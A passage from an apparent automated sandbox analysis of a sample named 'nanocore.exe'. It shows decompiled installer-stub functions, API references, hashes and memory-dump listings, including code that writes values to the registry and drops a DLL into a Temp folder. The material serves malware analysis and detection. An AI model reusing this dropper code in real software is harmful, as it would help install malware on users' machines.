            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
            • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-3081826266
            • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
            • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
            Download Yara Rule
            C-Code - Quality: 85%
            			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}










            0x00402387
            0x0040238c
            0x00402396
            0x004023a0
            0x004023a3
            0x004023b5
            0x004023bc
            0x004023c4
            0x004023d2
            0x004023d6
            0x004023e1
            0x004023e1
            0x004023e5
            0x004023e9
            0x004023ef
            0x004023f4
            0x004023f4
            0x004023f8
            0x00402404
            0x00402404
            0x0040241d
            0x0040241f
            0x0040241f
            0x00402422
            0x004024fb
            0x004024fb
            0x00402932
            0x0040293e

            APIs
            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
            • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
            • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
            • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CloseCreateValuelstrlen
            • String ID:
            • API String ID: 1356686001-0
            • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
            • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 85%
            			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






            0x00401f50
            0x00401f53
            0x00401f5b
            0x00401f60
            0x00401f65
            0x00401f69
            0x00401f6c
            0x00401f6e
            0x00401f75
            0x00401f7e
            0x00401f86
            0x00401f89
            0x00401f9e
            0x00401fa4
            0x00401fb7
            0x00401fc0
            0x00401fcc
            0x00401fd1
            0x00401fd1
            0x00401fb7
            0x00401fd4
            0x00401be1
            0x00401be1
            0x00401f89
            0x00402932
            0x0040293e

            APIs
            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
            • String ID:
            • API String ID: 1404258612-0
            • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
            • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
            Download Yara Rule
            C-Code - Quality: 92%
            			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








            0x004021fc
            0x00402200
            0x00402208
            0x0040220e
            0x00402211
            0x0040221e
            0x0040222f
            0x00402233
            0x0040223a
            0x00402243
            0x0040224b
            0x0040224e
            0x00402251
            0x00402255
            0x00402266
            0x0040226f
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • lstrlenA.KERNEL32 ref: 00402218
            • lstrlenA.KERNEL32(00000000), ref: 00402222
            • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
            • String ID:
            • API String ID: 3674637002-0
            • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
            • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








            0x00405568
            0x0040556f
            0x00405572
            0x00405577
            0x0040558a
            0x004055a4
            0x00000000
            0x004055a4
            0x0040558e
            0x0040558f
            0x00405592
            0x00405593
            0x0040559b
            0x00000000
            0x00000000
            0x0040559d
            0x004055a0
            0x00000000
            0x00000000
            0x00000000
            0x004055a0
            0x00000000
            0x00405580
            0x00000000
            0x00405581

            APIs
            • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040556D
            • CharNextA.USER32(00000000), ref: 00405572
            • CharNextA.USER32(00000000), ref: 00405581
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharNext
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 3213498283-3081826266
            • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
            • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
            Download Yara Rule
            C-Code - Quality: 61%
            			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











            0x00401d9c
            0x00401db5
            0x00401dbf
            0x00401dc4
            0x00401dcf
            0x00401dd6
            0x00401de8
            0x00401dee
            0x00401df3
            0x00401dfd
            0x00402536
            0x00401581
            0x004028d7
            0x00402932
            0x0040293e

            APIs
            • GetDC.USER32(?), ref: 00401D95
            • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
            • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CapsCreateDeviceFontIndirect
            • String ID:
            • API String ID: 3272661963-0
            • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
            • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}





            0x00404cad
            0x00404cca
            0x00404cce
            0x00404cd0
            0x00404cd0
            0x00404cd0
            0x00404cd7
            0x00404ce3
            0x00404d03
            0x00000000
            0x00404ce5
            0x00404ce8
            0x00404cee
            0x00404cf0
            0x00404d43
            0x00404d43
            0x00404d46
            0x00000000
            0x00404d56
            0x00404cfc
            0x00404cfe
            0x00404d06
            0x00404d06
            0x00404d09
            0x00404d0b
            0x00404d11
            0x00404d20
            0x00404d26
            0x00404d2d
            0x00404d34
            0x00404d3b
            0x00404d40
            0x00404d11
            0x00000000
            0x00404d09
            0x00404ce3
            0x00404cb3
            0x00404cbe
            0x00000000
            0x00404cc3
            0x00000000

            APIs
            • IsWindowVisible.USER32(?), ref: 00404CE8
            • CallWindowProcA.USER32 ref: 00404D56
              • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
            • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









            0x0040253c
            0x0040253c
            0x0040253f
            0x0040255a
            0x00402541
            0x00402543
            0x00402548
            0x0040254f
            0x00402561
            0x004026da
            0x004026da
            0x00402567
            0x00402579
            0x004015c8
            0x004015ca
            0x00000000
            0x004015d0
            0x004015ca
            0x00402932
            0x0040293e

            APIs
            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,00000000,?,?,00000000,00000011), ref: 00402579
            Strings
            • C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll, xrefs: 00402548, 0040256D
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileWritelstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 427699356-4214189533
            • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
            • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





            0x00405514
            0x0040551e
            0x00405520
            0x00405527
            0x0040552f
            0x00000000
            0x00000000
            0x00000000
            0x0040552f
            0x00405531
            0x00405535

            APIs
            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\Desktop
            • API String ID: 2709904686-224404859
